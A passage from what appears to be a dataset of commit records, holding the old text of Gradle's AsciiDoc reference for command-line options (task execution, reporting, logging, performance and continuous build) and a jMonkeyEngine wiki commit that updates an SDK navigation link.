changes to task configuration, or any other change to the build model, are effectively ignored.\n","old_contents":"\/\/ Copyright 2017 the original author or authors.\n\/\/\n\/\/ Licensed under the Apache License, Version 2.0 (the \"License\");\n\/\/ you may not use this file except in compliance with the License.\n\/\/ You may obtain a copy of the License at\n\/\/\n\/\/ http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\/\/\n\/\/ Unless required by applicable law or agreed to in writing, software\n\/\/ distributed under the License is distributed on an \"AS IS\" BASIS,\n\/\/ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n\/\/ See the License for the specific language governing permissions and\n\/\/ limitations under the License.\n\n[[command_line_interface]]\n= Command-Line Interface\n\n[.lead]\nThe command-line interface is one of the primary methods of interacting with Gradle. The following serves as a reference for executing and customizing Gradle from the command line, as well as for writing scripts or configuring continuous integration.\n\nUse of the <<gradle_wrapper.adoc#gradle_wrapper, Gradle Wrapper>> is highly encouraged. You should substitute `.\/gradlew` or `gradlew.bat` for `gradle` in all following examples when using the Wrapper.\n\nExecuting Gradle on the command-line conforms to the following structure. Options are allowed before and after task names.\n----\ngradle [taskName...] 
[--option-name...]\n----\n\nIf multiple tasks are specified, they should be separated with a space.\n\nOptions that accept values can be specified with or without `=` between the option and argument; however, use of `=` is recommended.\n----\n--console=plain\n----\n\nOptions that enable behavior have long-form options with inverses specified with `--no-`. The following are opposites.\n----\n--build-cache\n--no-build-cache\n----\n\nMany long-form options have short option equivalents. The following are equivalent:\n----\n--help\n-h\n----\n\n[NOTE]\n====\nMany command-line flags can be specified in `gradle.properties` to avoid needing to be typed. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>> for details.\n====\n\nThe following sections describe use of the Gradle command-line interface, grouped roughly by user goal. Some plugins also add their own command line options, for example <<java_testing.adoc#test_filtering,`--tests` for Java test filtering>>. For more information on exposing command line options for your own tasks, see <<custom_tasks.adoc#sec:declaring_and_using_command_line_options,Declaring and using command-line options>>.\n\n[[sec:command_line_executing_tasks]]\n== Executing tasks\n\nYou can learn about what projects and tasks are available in the <<#sec:command_line_project_reporting, project reporting section>>.\nMost builds support a common set of tasks known as <<more_about_tasks#sec:lifecycle_tasks,_lifecycle tasks_>>. These include the `build`, `assemble`, and `check` tasks.\n\nIn order to execute a task called \"myTask\" on the root project, type:\n----\n$ gradle :myTask\n----\n\nThis will run the single \"myTask\" and also all of its <<tutorial_using_tasks.adoc#sec:task_dependencies,task dependencies>>.\n\n[[executing_tasks_in_multi_project_builds]]\n=== Executing tasks in multi-project builds\n\nIn a <<intro_multi_project_builds.adoc#intro_multi_project_builds, multi-project build>>, subproject tasks can be executed with \":\" separating subproject name and task name.\nThe following are equivalent _when run from the root project_:\n----\n$ gradle :my-subproject:taskName\n$ gradle my-subproject:taskName\n----\n\nYou can also run a task for _all_ subprojects by using a task _selector_ that consists of the task name only.\nFor example, this will run the \"test\" task for all subprojects when invoked from the root project directory:\n----\n$ gradle test\n----\n\n[NOTE]\n====\nSome task selectors, like `help` or `dependencies`, will only run the task on the project they are invoked on and not on all the subprojects.\nThe main motivation for this is that these tasks print out information that would be hard to process if it combined the information from all projects.\n====\n\nWhen invoking Gradle from within a subproject, the project name should be omitted:\n----\n$ cd my-subproject\n$ gradle taskName\n----\n\n[NOTE]\n====\nWhen executing the Gradle Wrapper from subprojects, one must reference `gradlew` relatively. For example: `..\/gradlew taskName`. The community http:\/\/www.gdub.rocks\/[gdub project] aims to make this more convenient.\n====\n\n=== Executing multiple tasks\nYou can also specify multiple tasks. 
For example, the following will execute the `test` and `deploy` tasks in the order that they are listed on the command-line and will also execute the dependencies for each task.\n\n----\n$ gradle test deploy\n----\n\n[[sec:excluding_tasks_from_the_command_line]]\n=== Excluding tasks from execution\nYou can exclude a task from being executed using the `-x` or `--exclude-task` command-line option and providing the name of the task to exclude.\n\n.Simple Task Graph\nimage::commandLineTutorialTasks.png[]\n\n.Excluding tasks\n----\n$ gradle dist --exclude-task test\ninclude::{snippetsPath}\/tutorial\/excludeTasks\/tests\/excludeTask.out[]\n----\n\nYou can see that the `test` task is not executed, even though it is a dependency of the `dist` task. The `test` task's dependencies such as `compileTest` are not executed either. Those dependencies of `test` that are required by another task, such as `compile`, are still executed.\n\n[[sec:rerun_tasks]]\n=== Forcing tasks to execute\n\nYou can force Gradle to execute all tasks ignoring <<more_about_tasks.adoc#sec:up_to_date_checks,up-to-date checks>> using the `--rerun-tasks` option:\n\n----\n$ gradle test --rerun-tasks\n----\n\nThis will force `test` and _all_ task dependencies of `test` to execute. It's a little like running `gradle clean test`, but without the build's generated output being deleted.\n\n[[sec:continue_build_on_failure]]\n=== Continuing the build when a failure occurs\n\nBy default, Gradle will abort execution and fail the build as soon as any task fails. This allows the build to complete sooner, but hides other failures that would have occurred. In order to discover as many failures as possible in a single build execution, you can use the `--continue` option.\n\n----\n$ gradle test --continue\n----\n\nWhen executed with `--continue`, Gradle will execute _every_ task to be executed where all of the dependencies for that task completed without failure, instead of stopping as soon as the first failure is encountered. Each of the encountered failures will be reported at the end of the build.\n\nIf a task fails, any subsequent tasks that were depending on it will not be executed. For example, tests will not run if there is a compilation failure in the code under test; because the test task will depend on the compilation task (either directly or indirectly).\n\n[[sec:name_abbreviation]]\n=== Name abbreviation\n\nWhen you specify tasks on the command-line, you don\u2019t have to provide the full name of the task. You only need to provide enough of the task name to uniquely identify the task. For example, it's likely `gradle che` is enough for Gradle to identify the `check` task.\n\nThe same applies for project names. You can execute the `check` task in the `library` subproject with the `gradle lib:che` command.\n\nYou can use https:\/\/en.wikipedia.org\/wiki\/Camel_case[camel case] patterns for more complex abbreviations. These patterns are expanded to match camel case and https:\/\/en.wikipedia.org\/wiki\/Kebab_case[kebab case] names. 
For example the pattern `foBa` (or even `fB`) matches `fooBar` and `foo-bar`.\n\nMore concretely, you can run the `compileTest` task in the `my-awesome-library` subproject with the `gradle mAL:cT` command.\n\n.Abbreviated project and task names\n----\n$ gradle mAL:cT\ninclude::{snippetsPath}\/tutorial\/nameMatching\/tests\/nameMatching.out[]\n----\n\nYou can also use these abbreviations with the -x command-line option.\n\n== Common tasks\n\nThe following are task conventions applied by built-in and most major Gradle plugins.\n\n=== Computing all outputs\n\nIt is common in Gradle builds for the `build` task to designate assembling all outputs and running all checks.\n\n----\n$ gradle build\n----\n\n=== Running applications\n\nIt is common for applications to be run with the `run` task, which assembles the application and executes some script or binary.\n\n----\n$ gradle run\n----\n\n=== Running all checks\n\nIt is common for _all_ verification tasks, including tests and linting, to be executed using the `check` task.\n\n----\n$ gradle check\n----\n\n=== Cleaning outputs\n\nYou can delete the contents of the build directory using the `clean` task, though doing so will cause pre-computed outputs to be lost, causing significant additional build time for the subsequent task execution.\n\n----\n$ gradle clean\n----\n\n[[sec:command_line_project_reporting]]\n== Project reporting\n\nGradle provides several built-in tasks which show particular details of your build. This can be useful for understanding the structure and dependencies of your build, and for debugging problems.\n\nYou can get basic help about available reporting options using `gradle help`.\n\n=== Listing projects\n\nRunning `gradle projects` gives you a list of the sub-projects of the selected project, displayed in a hierarchy.\n\n----\n$ gradle projects\n----\n\nYou also get a project report within build scans. Learn more about https:\/\/scans.gradle.com\/[creating build scans].\n\n[[sec:listing_tasks]]\n=== Listing tasks\n\nRunning `gradle tasks` gives you a list of the main tasks of the selected project. This report shows the default tasks for the project, if any, and a description for each task.\n\n----\n$ gradle tasks\n----\n\nBy default, this report shows only those tasks which have been assigned to a task group. 
You can obtain more information in the task listing using the `--all` option.\n\n----\n$ gradle tasks --all\n----\n\nIf you need to be more precise, you can display only the tasks from a specific group using the `--group` option.\n\n----\n$ gradle tasks --group=\"build setup\"\n----\n\n[[sec:show_task_details]]\n=== Show task usage details\n\nRunning `gradle help --task someTask` gives you detailed information about a specific task.\n\n.Obtaining detailed help for tasks\n----\n$ gradle -q help --task libs\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/taskHelp.out[]\n----\n\nThis information includes the full task path, the task type, possible command line options and the description of the given task.\n\n=== Reporting dependencies\n\nBuild scans give a full, visual report of what dependencies exist on which configurations, transitive dependencies, and dependency version selection.\n\n----\n$ gradle myTask --scan\n----\n\nThis will give you a link to a web-based report, where you can find dependency information like this.\n\nimage::gradle-core-test-build-scan-dependencies.png[Build Scan dependencies report]\n\nLearn more in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\n=== Listing project dependencies\n\nRunning `gradle dependencies` gives you a list of the dependencies of the selected project, broken down by configuration. For each configuration, the direct and transitive dependencies of that configuration are shown in a tree. Below is an example of this report:\n\n----\n$ gradle dependencies\n----\n\nConcrete examples of build scripts and output are available in <<viewing_debugging_dependencies.adoc#viewing-debugging-dependencies,Viewing and debugging dependencies>>.\n\nRunning `gradle buildEnvironment` visualizes the buildscript dependencies of the selected project, similarly to how `gradle dependencies` visualizes the dependencies of the software being built.\n\n----\n$ gradle buildEnvironment\n----\n\nRunning `gradle dependencyInsight` gives you an insight into a particular dependency (or dependencies) that match the specified input.\n\n----\n$ gradle dependencyInsight\n----\n\nSince a dependency report can get large, it can be useful to restrict the report to a particular configuration. This is achieved with the optional `--configuration` parameter.\n\n[[sec:listing_properties]]\n=== Listing project properties\n\nRunning `gradle properties` gives you a list of the properties of the selected project.\n\n.Information about properties\n----\n$ gradle -q api:properties\ninclude::{snippetsPath}\/tutorial\/projectReports\/tests\/propertyListReport.out[]\n----\n\n[[sec:command_line_completion]]\n== Command-line completion\n\nGradle provides bash and zsh tab completion support for tasks, options, and Gradle properties through https:\/\/github.com\/gradle\/gradle-completion[gradle-completion], installed separately.\n\n.Gradle Completion\nimage::gradle-completion-4.0.gif[]\n\n[[sec:command_line_debugging]]\n== Debugging options\n\n`-?`, `-h`, `--help`::\nShows a help message with all available CLI options.\n\n`-v`, `--version`::\nPrints Gradle, Groovy, Ant, JVM, and operating system version information.\n\n`-S`, `--full-stacktrace`::\nPrint out the full (very verbose) stacktrace for any exceptions. See also <<#sec:command_line_logging, logging options>>.\n\n`-s`, `--stacktrace`::\nPrint out the stacktrace also for user exceptions (e.g. compile error). 
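For example (the `build` task here is just an illustration; the flag can accompany any task invocation):\n+\n----\n$ gradle build --stacktrace\n----\n+\n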
See also <<#sec:command_line_logging, logging options>>.\n\n`--scan`::\nCreate a https:\/\/gradle.com\/build-scans[build scan] with fine-grained information about all aspects of your Gradle build.\n\n`-Dorg.gradle.debug=true`::\nDebug Gradle client (non-Daemon) process. Gradle will wait for you to attach a debugger at `localhost:5005` by default.\n\n`-Dorg.gradle.debug.port=(port number)`::\nSpecifies the port number on which the process is listening when debug is enabled. _Default is `5005`._\n\n`-Dorg.gradle.debug.server=true`::\nIf set to `true` and debugging is enabled, Gradle will run the build with the socket-attach mode of the debugger. Otherwise, the socket-listen mode is used.\n\n`-Dorg.gradle.debug.suspend=true`::\nWhen set to `true` and debugging is enabled, the JVM running Gradle will suspend until a debugger is attached.\n\n`-Dorg.gradle.daemon.debug=true`::\nDebug <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> process.\n\n[[sec:command_line_performance]]\n== Performance options\nTry these options when optimizing build performance. Learn more about <<performance.adoc#performance_gradle,improving performance of Gradle builds here>>.\n\nMany of these options can be specified in `gradle.properties` so command-line flags are not necessary. See the <<build_environment.adoc#sec:gradle_configuration_properties, configuring build environment guide>>.\n\n`--build-cache`, `--no-build-cache`::\nToggles the <<build_cache.adoc#build_cache, Gradle build cache>>. Gradle will try to reuse outputs from previous builds. _Default is off_.\n\n`--configure-on-demand`, `--no-configure-on-demand`::\nToggles <<multi_project_configuration_and_execution.adoc#sec:configuration_on_demand, Configure-on-demand>>. Only relevant projects are configured in this build run. _Default is off_.\n\n`--max-workers`::\nSets maximum number of workers that Gradle may use. _Default is number of processors_.\n\n`--parallel`, `--no-parallel`::\nBuild projects in parallel. For limitations of this option, see <<multi_project_configuration_and_execution.adoc#sec:parallel_execution, Parallel Project Execution>>. _Default is off_.\n\n`--priority`::\nSpecifies the scheduling priority for the Gradle daemon and all processes launched by it. Values are `normal` or `low`. _Default is normal_.\n\n`--profile`::\nGenerates a high-level performance report in the `$buildDir\/reports\/profile` directory. `--scan` is preferred.\n\n`--scan`::\nGenerate a build scan with detailed performance diagnostics.\n\nimage::gradle-core-test-build-scan-performance.png[Build Scan performance report]\n\n`--watch-fs`, `--no-watch-fs`::\nToggles <<gradle_daemon.adoc#sec:daemon_watch_fs,watching the file system>>.\nWhen enabled, Gradle re-uses information it collects about the file system between builds.\n_Enabled by default on operating systems where Gradle supports this feature._\n\n=== Gradle daemon options\nYou can manage the <<gradle_daemon.adoc#gradle_daemon,Gradle Daemon>> through the following command line options.\n\n`--daemon`, `--no-daemon`::\nUse the <<gradle_daemon.adoc#gradle_daemon, Gradle Daemon>> to run the build. Starts the daemon if it is not running, or if the existing daemon is busy. _Default is on_.\n\n`--foreground`::\nStarts the Gradle Daemon in a foreground process.\n\n`--status` (Standalone command)::\nRun `gradle --status` to list running and recently stopped Gradle daemons. 
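For example, to check the daemons on the current machine:\n+\n----\n$ gradle --status\n----\n+\n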
Only displays daemons of the same Gradle version.\n\n`--stop` (Standalone command)::\nRun `gradle --stop` to stop all Gradle Daemons of the same version.\n\n`-Dorg.gradle.daemon.idletimeout=(number of milliseconds)`::\nGradle Daemon will stop itself after this number of milliseconds of idle time. _Default is 10800000_ (3 hours).\n\n\n[[sec:command_line_logging]]\n== Logging options\n\n=== Setting log level\nYou can customize the verbosity of Gradle logging with the following options, ordered from least verbose to most verbose. Learn more in the <<logging.adoc#logging, logging documentation>>.\n\n`-Dorg.gradle.logging.level=(quiet,warn,lifecycle,info,debug)`::\nSet logging level via Gradle properties.\n\n`-q`, `--quiet`::\nLog errors only.\n\n`-w`, `--warn`::\nSet log level to warn.\n\n`-i`, `--info`::\nSet log level to info.\n\n`-d`, `--debug`::\nLog in debug mode (includes normal stacktrace).\n\nLifecycle is the default log level.\n\n[[sec:command_line_customizing_log_format]]\n=== Customizing log format\nYou can control the use of rich output (colors and font variants) by specifying the \"console\" mode in the following ways:\n\n`-Dorg.gradle.console=(auto,plain,rich,verbose)`::\nSpecify console mode via Gradle properties. The different modes are described immediately below.\n\n`--console=(auto,plain,rich,verbose)`::\nSpecifies which type of console output to generate.\n+\nSet to `plain` to generate plain text only. This option disables all color and other rich output in the console output. This is the default when Gradle is _not_ attached to a terminal.\n+\nSet to `auto` (the default) to enable color and other rich output in the console output when the build process is attached to a console, or to generate plain text only when not attached to a console. _This is the default when Gradle is attached to a terminal._\n+\nSet to `rich` to enable color and other rich output in the console output, regardless of whether the build process is attached to a console. When not attached to a console, the build output will use ANSI control characters to generate the rich output.\n+\nSet to `verbose` to enable color and other rich output like `rich`, but also output task names and outcomes at the lifecycle log level, as is done by default in Gradle 3.5 and earlier.\n\n[[sec:command_line_warnings]]\n=== Showing or hiding warnings\nBy default, Gradle won't display all warnings (e.g. deprecation warnings). Instead, Gradle will collect them and render a summary at the end of the build like:\n\n----\nDeprecated Gradle features were used in this build, making it incompatible with Gradle 5.0.\n----\n\nYou can control the verbosity of warnings on the console with the following options:\n\n`-Dorg.gradle.warning.mode=(all,fail,none,summary)`::\nSpecify warning mode via <<build_environment.adoc#sec:gradle_configuration_properties, Gradle properties>>. The different modes are described immediately below.\n\n`--warning-mode=(all,fail,none,summary)`::\nSpecifies how to log warnings. 
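For example, to surface every warning during a build (the `build` task is illustrative):\n+\n----\n$ gradle build --warning-mode=all\n----\n+\n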
Default is `summary`.\n+\nSet to `all` to log all warnings.\n+\nSet to `fail` to log all warnings and fail the build if there are any warnings.\n+\nSet to `summary` to suppress all warnings and log a summary at the end of the build.\n+\nSet to `none` to suppress all warnings, including the summary at the end of the build.\n\n[[sec:rich_console]]\n=== Rich Console\nGradle's rich console displays extra information while builds are running.\n\nimage::rich-cli.png[alt=\"Gradle Rich Console\"]\n\nFeatures:\n\n * Progress bar and timer visually describe overall status\n * Parallel work-in-progress lines below describe what is happening now\n * Colors and fonts are used to highlight important output and errors\n\n[[sec:command_line_execution_options]]\n== Execution options\nThe following options affect how builds are executed, by changing what is built or how dependencies are resolved.\n\n`--include-build`::\nRun the build as a composite, including the specified build. See <<composite_builds.adoc#composite_builds, Composite Builds>>.\n\n`--offline`::\nSpecifies that the build should operate without accessing network resources. Learn more about <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,options to override dependency caching>>.\n\n`--refresh-dependencies`::\nRefresh the state of dependencies. Learn more about how to use this in the <<dynamic_versions.adoc#sec:controlling_dependency_caching_command_line,dependency management docs>>.\n\n`--dry-run`::\nRun Gradle with all task actions disabled. Use this to show which task would have executed.\n\n`--write-locks`::\nIndicates that all resolved configurations that are _lockable_ should have their lock state persisted.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--update-locks <group:name>[,<group:name>]*`::\nIndicates that versions for the specified modules have to be updated in the lock file.\nThis flag also implies `--write-locks`.\nLearn more about this in <<dependency_locking.adoc#dependency-locking,dependency locking>>.\n\n`--no-rebuild`::\nDo not rebuild project dependencies.\nUseful for <<organizing_gradle_projects.adoc#sec:build_sources, debugging and fine-tuning `buildSrc`>>, but can lead to wrong results. Use with caution!\n\n[[sec:environment_options]]\n== Environment options\nYou can customize many aspects about where build scripts, settings, caches, and so on through the options below. Learn more about customizing your <<build_environment.adoc#build_environment, build environment>>.\n\n`-b`, `--build-file` (deprecated)::\nSpecifies the build file. For example: `gradle --build-file=foo.gradle`. The default is `build.gradle`, then `build.gradle.kts`.\n\n`-c`, `--settings-file` (deprecated)::\nSpecifies the settings file. For example: `gradle --settings-file=somewhere\/else\/settings.gradle`\n\n`-g`, `--gradle-user-home`::\nSpecifies the Gradle user home directory. The default is the `.gradle` directory in the user's home directory.\n\n`-p`, `--project-dir`::\nSpecifies the start directory for Gradle. Defaults to current directory.\n\n`--project-cache-dir`::\nSpecifies the project-specific cache directory. Default value is `.gradle` in the root project directory.\n\n`-D`, `--system-prop`::\nSets a system property of the JVM, for example `-Dmyprop=myvalue`. See <<build_environment.adoc#sec:gradle_system_properties,System Properties>>.\n\n`-I`, `--init-script`::\nSpecifies an initialization script. 
See <<init_scripts.adoc#init_scripts,Init Scripts>>.\n\n`-P`, `--project-prop`::\nSets a project property of the root project, for example `-Pmyprop=myvalue`. See <<build_environment.adoc#sec:project_properties,Project Properties>>.\n\n`-Dorg.gradle.jvmargs`::\nSet JVM arguments.\n\n`-Dorg.gradle.java.home`::\nSet JDK home dir.\n\n[[sec:command_line_bootstrapping_projects]]\n== Bootstrapping new projects\n\n=== Creating new Gradle builds\nUse the built-in `gradle init` task to create a new Gradle builds, with new or existing projects.\n\n----\n$ gradle init\n----\n\nMost of the time you'll want to specify a project type. Available types include `basic` (default), `java-library`, `java-application`, and more. See <<build_init_plugin.adoc#build_init_plugin, init plugin documentation>> for details.\n\n----\n$ gradle init --type java-library\n----\n\n=== Standardize and provision Gradle\nThe built-in `gradle wrapper` task generates a script, `gradlew`, that invokes a declared version of Gradle, downloading it beforehand if necessary.\n\n----\n$ gradle wrapper --gradle-version=4.4\n----\n\nYou can also specify `--distribution-type=(bin|all)`, `--gradle-distribution-url`, `--gradle-distribution-sha256-sum` in addition to `--gradle-version`. Full details on how to use these options are documented in the <<gradle_wrapper.adoc#gradle_wrapper,Gradle wrapper section>>.\n\n[[sec:continuous_build]]\n== Continuous Build\n\nContinuous Build allows you to automatically re-execute the requested tasks when task inputs change.\n\nFor example, you can continuously run the `test` task and all dependent tasks by running:\n\n----\n$ gradle test --continuous\n----\n\nGradle will behave as if you ran `gradle test` after a change to sources or tests that contribute to the requested tasks. This means that unrelated changes (such as changes to build scripts) will not trigger a rebuild. In order to incorporate build logic changes, the continuous build must be restarted manually.\n\n=== Terminating Continuous Build\n\nIf Gradle is attached to an interactive input source, such as a terminal, the continuous build can be exited by pressing `CTRL-D` (On Microsoft Windows, it is required to also press `ENTER` or `RETURN` after `CTRL-D`). If Gradle is not attached to an interactive input source (e.g. is running as part of a script), the build process must be terminated (e.g. using the `kill` command or similar). If the build is being executed via the Tooling API, the build can be cancelled using the Tooling API's cancellation mechanism.\n\n[[continuous_build_limitations]]\n=== Limitations and quirks\n\nThere are several issues to be aware with the current implementation of continuous build. These are likely to be addressed in future Gradle releases.\n\n[[sec:build_cycles]]\n==== Build cycles\n\nGradle starts watching for changes just before a task executes. If a task modifies its own inputs while executing, Gradle will detect the change and trigger a new build. If every time the task executes, the inputs are modified again, the build will be triggered again. This isn't unique to continuous build. A task that modifies its own inputs will never be considered up-to-date when run \"normally\" without continuous build.\n\nIf your build enters a build cycle like this, you can track down the task by looking at the list of files reported changed by Gradle. After identifying the file(s) that are changed during each build, you should look for a task that has that file as an input. 
In some cases, it may be obvious (e.g., a Java file is compiled with `compileJava`). In other cases, you can use `--info` logging to find the task that is out-of-date due to the identified files.\n\n[[sec:continuous_build_limitations_jdk9]]\n==== Restrictions with Java 9\n\nDue to class access restrictions related to Java 9, Gradle cannot set some operating system specific options, which means that:\n\n* On macOS, Gradle will poll for file changes every 10 seconds instead of every 2 seconds.\n* On Windows, Gradle must use individual file watches (like on Linux\/Mac OS), which may cause continuous build to no longer work on very large projects.\n\n[[sec:performance_and_stability]]\n==== Performance and stability\n\nThe JDK file watching facility relies on inefficient file system polling on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-7133447[JDK-7133447]). This can significantly delay notification of changes on large projects with many source files.\n\nAdditionally, the watching mechanism may deadlock under _heavy_ load on macOS (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8079620[JDK-8079620]). This will manifest as Gradle appearing not to notice file changes. If you suspect this is occurring, exit continuous build and start again.\n\nOn Linux, OpenJDK's implementation of the file watch service can sometimes miss file system events (see: https:\/\/bugs.openjdk.java.net\/browse\/JDK-8145981[JDK-8145981]).\n\n[[sec:changes_to_symbolic_links]]\n==== Changes to symbolic links\n\n * Creating or removing symbolic link to files will initiate a build.\n * Modifying the target of a symbolic link will not cause a rebuild.\n * Creating or removing symbolic links to directories will not cause rebuilds.\n * Creating new files in the target directory of a symbolic link will not cause a rebuild.\n * Deleting the target directory will not cause a rebuild.\n\n[[sec:changes_to_build_logic_are_not_considered]]\n==== Changes to build logic are not considered\n\nThe current implementation does not recalculate the build model on subsequent builds. 
This means that changes to task configuration, or any other change to the build model, are effectively ignored.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"00394d0e7465245f1dbb465f2a78592dd590756a","subject":"point to sdk page","message":"point to sdk page\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/nav.adoc","new_file":"docs\/modules\/sdk\/nav.adoc","new_contents":"* xref:sdk.adoc[SDK]\n** Video Tutorials\n*** SDK Use Case Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=-OzRZscLlHY[Demo 1 (Quixote demo)]\n**** link:http:\/\/www.youtube.com\/watch?v=6-YWxD3JByE[Demo 2 (Models and Materials)]\n*** SDK Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=M1_0pbeyJzI[Basics]\n**** link:http:\/\/www.youtube.com\/watch?v=nL7woH40i5c[Importing Models]\n**** link:http:\/\/www.youtube.com\/watch?v=DUmgAjiNzhY[Dragging&Dropping Nodes]\n**** link:http:\/\/www.youtube.com\/watch?v=ntPAmtsQ6eM[Scene Composing]\n**** link:http:\/\/www.youtube.com\/watch?v=zgPV3W6dD4s[Terrain with Collision Shape]\n**** link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Working with Materials]\n**** link:http:\/\/www.youtube.com\/watch?v=MNDiZ9YHIpM[Custom Controls]\n**** link:http:\/\/www.youtube.com\/watch?v=oZnssg8TBWQ[WebStart Deployment]\n**** link:http:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Animation and Effect TrackEditing]\n** Getting Started\n*** xref:update_center.adoc[Updating jMonkeyEngine SDK]\n*** xref:troubleshooting.adoc[Troubleshooting]\n** Java Development Features\n*** xref:project_creation.adoc[Project Creation]\n*** xref:code_editor.adoc[Code Editor and Palette]\n*** xref:version_control.adoc[File Version Control]\n*** xref:debugging_profiling_testing.adoc[Debug, Profile, Test]\n*** xref:application_deployment.adoc[Application Deployment]\n**** xref:default_build_script.adoc[Default Build Script]\n**** xref:android.adoc[Android]\n**** xref:ios.adoc[iOS]\n** Unique Features\n*** xref:model_loader_and_viewer.adoc[Import, View, Convert Models]\n**** xref:asset_packs.adoc[Asset Packs]\n*** xref:scene_explorer.adoc[The SceneExplorer]\n*** xref:scene_composer.adoc[Composing a Scene]\n*** xref:terrain_editor.adoc[Terrain Editor]\n*** xref:sample_code.adoc[Sample Code]\n*** xref:material_editing.adoc[Material Editing]\n*** xref:font_creation.adoc[Creating Bitmap Fonts]\n*** link:https:\/\/hub.jmonkeyengine.org\/t\/effecttrack-and-audiotrack-editing-in-the-sdk\/23378[Audio and Effect Track Editing] \u00a0\n**** link:https:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Video: Effect and AudioTrack editing in jMonkeyEngine 3 sdk]\n\/\/* <<sdk\/attachment_bones#,Animation and Attachment Bones Editing>>\n*** xref:filters.adoc[Post-Processor Filter Editor and Viewer]\n\/\/* <<sdk\/blender#,Blender Importer>>\n*** xref:ROOT:jme3\/advanced\/application_states.adoc[Application States]\n*** xref:ROOT:jme3\/advanced\/custom_controls.adoc[Custom Controls]\n*** xref:vehicle_creator.adoc[Vehicle Creator]\n** Advanced Usage\n*** xref:use_own_jme#.adoc[Using your own (modified) version of jME3 in jMonkeyEngine SDK]\n*** xref:development\/model_loader.adoc[Create a custom model importer]\n*** xref:increasing_heap_memory.adoc[Increasing Heap Memory]\n** Available external plugins\n*** xref:ROOT:jme3\/contributions.adoc[Contributions]\n*** xref:neotexture.adoc[Neo Texture Editor for procedural textures]\n*** 
link:http:\/\/www.youtube.com\/watch?v=yS9a9o4WzL8[Video: Mesh Tool & Physics Editor]\n** Development\n*** xref:build_platform.adoc[Building jMonkeyEngine SDK]\n*** xref:development.adoc[Developing plugins for jMonkeyEngine SDK]\n","old_contents":"* xref:sdk.adoc[SDK]\n** Video Tutorials\n*** SDK Use Case Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=-OzRZscLlHY[Demo 1 (Quixote demo)]\n**** link:http:\/\/www.youtube.com\/watch?v=6-YWxD3JByE[Demo 2 (Models and Materials)]\n*** SDK Tutorials\n**** link:http:\/\/www.youtube.com\/watch?v=M1_0pbeyJzI[Basics]\n**** link:http:\/\/www.youtube.com\/watch?v=nL7woH40i5c[Importing Models]\n**** link:http:\/\/www.youtube.com\/watch?v=DUmgAjiNzhY[Dragging&Dropping Nodes]\n**** link:http:\/\/www.youtube.com\/watch?v=ntPAmtsQ6eM[Scene Composing]\n**** link:http:\/\/www.youtube.com\/watch?v=zgPV3W6dD4s[Terrain with Collision Shape]\n**** link:http:\/\/www.youtube.com\/watch?v=Feu3-mrpolc[Working with Materials]\n**** link:http:\/\/www.youtube.com\/watch?v=MNDiZ9YHIpM[Custom Controls]\n**** link:http:\/\/www.youtube.com\/watch?v=oZnssg8TBWQ[WebStart Deployment]\n**** link:http:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Animation and Effect TrackEditing]\n** Getting Started\n*** xref:update_center.adoc[Updating jMonkeyEngine SDK]\n*** xref:troubleshooting.adoc[Troubleshooting]\n** Java Development Features\n*** xref:project_creation.adoc[Project Creation]\n*** xref:code_editor.adoc[Code Editor and Palette]\n*** xref:version_control.adoc[File Version Control]\n*** xref:debugging_profiling_testing.adoc[Debug, Profile, Test]\n*** xref:application_deployment.adoc[Application Deployment]\n**** xref:default_build_script.adoc[Default Build Script]\n**** xref:android.adoc[Android]\n**** xref:ROOT:jme3\/ios.adoc[iOS]\n** Unique Features\n*** xref:model_loader_and_viewer.adoc[Import, View, Convert Models]\n**** xref:asset_packs.adoc[Asset Packs]\n*** xref:scene_explorer.adoc[The SceneExplorer]\n*** xref:scene_composer.adoc[Composing a Scene]\n*** xref:terrain_editor.adoc[Terrain Editor]\n*** xref:sample_code.adoc[Sample Code]\n*** xref:material_editing.adoc[Material Editing]\n*** xref:font_creation.adoc[Creating Bitmap Fonts]\n*** link:https:\/\/hub.jmonkeyengine.org\/t\/effecttrack-and-audiotrack-editing-in-the-sdk\/23378[Audio and Effect Track Editing] \u00a0\n**** link:https:\/\/www.youtube.com\/watch?v=D7JM4VMKqPc[Video: Effect and AudioTrack editing in jMonkeyEngine 3 sdk]\n\/\/* <<sdk\/attachment_bones#,Animation and Attachment Bones Editing>>\n*** xref:filters.adoc[Post-Processor Filter Editor and Viewer]\n\/\/* <<sdk\/blender#,Blender Importer>>\n*** xref:ROOT:jme3\/advanced\/application_states.adoc[Application States]\n*** xref:ROOT:jme3\/advanced\/custom_controls.adoc[Custom Controls]\n*** xref:vehicle_creator.adoc[Vehicle Creator]\n** Advanced Usage\n*** xref:use_own_jme#.adoc[Using your own (modified) version of jME3 in jMonkeyEngine SDK]\n*** xref:development\/model_loader.adoc[Create a custom model importer]\n*** xref:increasing_heap_memory.adoc[Increasing Heap Memory]\n** Available external plugins\n*** xref:ROOT:jme3\/contributions.adoc[Contributions]\n*** xref:neotexture.adoc[Neo Texture Editor for procedural textures]\n*** link:http:\/\/www.youtube.com\/watch?v=yS9a9o4WzL8[Video: Mesh Tool & Physics Editor]\n** Development\n*** xref:build_platform.adoc[Building jMonkeyEngine SDK]\n*** xref:development.adoc[Developing plugins for jMonkeyEngine 